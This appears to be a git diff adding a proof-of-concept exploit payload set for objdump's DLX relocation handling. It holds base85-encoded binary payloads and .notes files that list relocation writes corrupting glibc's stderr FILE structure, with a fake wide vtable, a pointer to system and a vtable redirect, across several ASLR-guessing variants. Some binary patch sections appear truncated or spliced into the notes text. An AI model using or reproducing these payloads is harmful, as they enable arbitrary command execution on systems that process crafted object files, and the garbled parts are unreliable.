diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..fe5f17101db92139bbeea0cba41a326f16d01e99 GIT binary patch literal 1280 zcmd5*%}QHA7(F-lYK+$3SgTcVp4g^Gf&(3fx} zeFvA?ClGWi_y!6J*Yn+<B90iD`BA$*2Wq0m|)-gwVXeH zK@#;9@4HH@8^BKS=(m8A^1Q1eP)DAa0_p{)fu!h%Km&Qx1CSDY1R4dOI0T=84@A2c zXcp`PTI6?sfmWOR7-$py1ZWri8t4%H21tv33v^Qd-v)f7?o0t))SYSIljw^;cOtmD zp6~`ghsZ5o2`(1!bbhb{-jBE(Q2A%)&Fi1*FGhMDJW) zzVuWSQJ$m_@5c#pzL82qwKNs>Kjy;9B~gZ~ FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..088ecfa3282e9ebdf427d469442ee9e63501a19a GIT binary patch literal 1280 zcmd5*%}QHA7(F-lYK+$3SgTcVp4g^Gf&(3fx} zeFvA?ClGWkzJY?m^?dgyxtWEy^n;o6o%5Z{%$qn}2C!2+`Yqt3JnyOq)R8BqfO^4cASwDG&_Lew0Hg#Tfkwe64#8*O1JUjU zng#oS7Wv&@pw%Wn2HHeF0op~s20BE)0n(!10-eE!Iod~Y3 zC%nPWA#%%Cf{Vre7w*K5qTPb$c|@lp;12URPvUy;U##9}_?rzs&yA;;KW+HC41bSN z=Y7@e-*40hjQUV2#9du~-td1n{7d9=uhD(3 zFqeqnCs~p*>xu?NhoVK%qi9leDcTf$E`6@7 zL!V2Z%lDTl7yguy`BBLK-rf3juv0{)RM@NG`e?trokvEOO9B22v+#^>0qHRr(L0xy zFFh4SlqV^~`*DJtZ=@1YElq{}kGZgNNt7Y$`1ed~;E=u$9)`uWtP7Gl4z{}Qm);x> bIYGi+<+SOi!4&PAm10%5&za9ud2sd@eL8;~ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.notes new file mode 100644 index 0000000..1662f26 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.notes 
@@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..a4ae6166a84e2aed66c5ee871a79d35c7804bfb7 GIT binary patch literal 1280 zcmd5*%}QHA7(F-lYK-+iRjU5W zcW|jbfuP$$-#|g(_I&pzxtWEy^n;o6o%5Z{%$)X=2m9S6=YyCI#m|*|&YdL@Z ziX`eQ-glK)_kf+^(H{UO<#{(HppHB-3DgTt0ZGvhfd=vqk3dTB31}32<`8@Vnuzvi zpjogFXp!Gt0IfFp8PF#BInXZp9nc~AJ&+dt0r*J$whic{?o0w*)SW4yTlDY1r$lgd zJ>d=ZhR7{n2`(1Vks{yU>wHmHRpcS+WorTUpk3x?@=b^`;Cs>j)>xu?NhoVK%qi9leDcTf$E`6@7 zL!V2Z%lDTl7f;H_Y!wT~+nc)wKTF6Q758emKHV?>C?KQDM*;4HS$M{`fb^J*=$*^U zm!66u%99l0{Wwm}H&ThHmZrk~$81=+Cd!a?{Cg%ga7bSW55wYG))h$|2V33uOK%Q^ boFHMZaN6+GV2bw5O0lZjf0$2Kd2sgseLR01 literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.notes new file mode 100644 index 0000000..84b0976 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.notes 
@@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..1b682a906e8579deaa1680782783307efb821573 GIT binary patch literal 1280 zcmd5*T}vB56g`{W7-OqOqqfn44+<6nv9nQ=5~ZbLEwo^v4~6<5hQ<%DMw|$Wf`7q3 z;gj?~^s((P2(jV?_OIe3vpPV&Y33!``WL~ z_}{0@2T-1vpvH`_Tl_E(f!N0&m zqCE!m3O)h)L)3rffMM!R4H%*B%ma@^e*-*D z1+6QD9UKjjNB$$YS>ku$N&Kg1x8Qjm(HRW5!#v3|Xit7k)O!qnui@vtag*@p4gZMY zFBo<9tKMlMT4S4(W2;4G%30iZHhjZ zK3Ddk&!x}h`zy5?hb@#oH|htQYumdUO_cT FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..8f5ab73c550552a01b1a4903ce864a89a5e4d211 GIT binary patch literal 1280 zcmd5*%Ss$U6g@rNI*yO1Gtu}6xQL)2jHw=U+^bf ziT{vg%ohl{75oDQh4$Qj*;5P2G8d}OJ@=luRek5yueopYR?0$b*7^ngM8JOVb3^{# zk2Gpy?SJK1w}74D)$af&<9XL5poTm(0n`dk0%?htfjaVrM<65k1k?*Ya|ylxjYPW} zXcGJke30Lr1I;%1DbOPEGoV%CH$Yb6w?Izfcfd!+|F!^aj5`xRJLAqI@JZr}Ku0QQ zU1!+At`K?TJH}#(|Ai;QLuW=kopKE5)A`Wv3?e+BZDfExe+ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.notes new file mode 100644 index 0000000..056e0d2 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.notes 
@@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..7c5ed7091b8c1afe535eb3d5e2fff048344eaee5 GIT binary patch literal 1280 zcmd5*%Ss$U6g@rNI*yO1Gtu}6xQL)2jHw=U+^bf ziT{vg%ohl{7XLs&p*^=>_S8bM%!R6R&%I}ERo}VwYwp{;m9h|pQb zBaPZv`(HWMEnsJO^*g}Hc;0mhs3A{H0JVaXKw9EuppLxZ5y%KW0ri5Hzuyf>Z``kbL}H}suG zp8cvizsJabG4g%oLAh>x{{cfkXy^;2+56=8jT(CPyXySuWxsq}f7Z}182Tl0>1))_ zW%^SLodAJzktk`tmvJ~ z%a@soEb`L~BiB&o)^W*P2oKF-E$cT)4Hrk<*UM}U dgq$E|uW;M&-C&E(ElBb$ZeP-$dgH;}Ujg*rfE)k- literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.notes new file mode 100644 index 0000000..0677195 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.notes 
@@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..4c4baf7179fc6ad2ad3f015828f37e020eacbb59 GIT binary patch literal 1280 zcmd5*+e%wO6kR9h#27F2l4^}D^r3=+5IZN)L{t<+Ewo^v4~6zY6ypW7hD-_-h5mv+ z;gk3eeXRY0KzuFq4-^!RYoD7Z^HBQO4Kr)6y;t_k+1c}b<=v{4vJji~>70HdVE^%R zC4Zkl1|6~XzjCY=U}t&tYrx5R-qjJ1CQr=)9fI>fM&dP~lf3%|$O_&9U4nO9g7-iV z(S8o}3cdiI$nVa8KAZdm=$H5@Fd*?JFevdBkdyc|@Radi{lF08&KxkzxHAttllU88 zBo(wSA9ipwL>~DUW3j~l!jt$>lw0sTkLU~r+@YW388pW(6ZtMf-)rc3Z`>vHIYU2e z=<`ON{c1b^rICMS5E1DLqKExv5o83&bC|8+tsbFyBqsoc8*Y}R}b2_K0a)0ZlRzX^#J!mFTCTwfXtYz z=$*^Umzjzz@-qx1=dnW0HxgTv%Q3?F$5NR2Nt7jZ{5}&qxnwSchi0*s^@AkM#ZmY5 gGMkejCy3eaxqbHCV2jQzO7byoU(jE8 FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..25023215a008bd50ba066e8b92e6c9603f597d1e GIT binary patch literal 1280 zcmd5*%Ss$U6g@rN+K$GkGiuZXvWTD{v{OAkQAtQJ5ez7}5Og7mVp>);S1kMF;5BhV_2IA zzoT%`TKE1}iS+>3Szf&gIN2chRt8$gGjl+z;5^`p{sm|w@AwI11%CnUf;BF|-@p^1 z{T%2Nd;vU_zqZg&+usPA=jO^E7vHKYWv_w;TRW!_Rx8mh$Hff4|`$ zH0tbE)A=ur`YWS8QZ7(w+<(mQj~o7C`R$Lif7U4T~5K6DX!0(ug93VIrP26~nyDYLF$UZr$Wfwx=Q`TA*V|7foa@3?f(#P#W6WqSvnt{g}BInLrc{tL*A$x7b2 zynLCdB$C{vke FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..fe5f17101db92139bbeea0cba41a326f16d01e99 GIT binary patch literal 1280 zcmd5*%}QHA7(F-lYK+$3SgTcVp4g^Gf&(3fx} zeFvA?ClGWi_y!6J*Yn+<B90iD`BA$*2Wq0m|)-gwVXeH zK@#;9@4HH@8^BKS=(m8A^1Q1eP)DAa0_p{)fu!h%Km&Qx1CSDY1R4dOI0T=84@A2c zXcp`PTI6?sfmWOR7-$py1ZWri8t4%H21tv33v^Qd-v)f7?o0t))SYSIljw^;cOtmD zp6~`ghsZ5o2`(1!bbhb{-jBE(Q2A%)&Fi1*FGhMDJW) zzVuWSQJ$m_@5c#pzL82qwKNs>Kjy;9B~gZ~ FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..088ecfa3282e9ebdf427d469442ee9e63501a19a GIT binary patch literal 1280 zcmd5*%}QHA7(F-lYK+$3SgTcVp4g^Gf&(3fx} zeFvA?ClGWkzJY?m^?dgyxtWEy^n;o6o%5Z{%$qn}2C!2+`Yqt3JnyOq)R8BqfO^4cASwDG&_Lew0Hg#Tfkwe64#8*O1JUjU zng#oS7Wv&@pw%Wn2HHeF0op~s20BE)0n(!10-eE!Iod~Y3 zC%nPWA#%%Cf{Vre7w*K5qTPb$c|@lp;12URPvUy;U##9}_?rzs&yA;;KW+HC41bSN z=Y7@e-*40hjQUV2#9du~-td1n{7d9=uhD(3 zFqeqnCs~p*>xu?NhoVK%qi9leDcTf$E`6@7 zL!V2Z%lDTl7yguy`BBLK-rf3juv0{)RM@NG`e?trokvEOO9B22v+#^>0qHRr(L0xy zFFh4SlqV^~`*DJtZ=@1YElq{}kGZgNNt7Y$`1ed~;E=u$9)`uWtP7Gl4z{}Qm);x> bIYGi+<+SOi!4&PAm10%5&za9ud2sd@eL8;~ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.notes new file mode 100644 index 0000000..a68f6bc --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.notes 
@@ -0,0 +1,34 @@ +layout=gnu2461 +flag_byte4=0x06 +buf_delta=0x6f300000 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb8 rbase=0x190 +sec_size_offset=0x40 + +000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8 +007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8 +008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc +009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc +010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
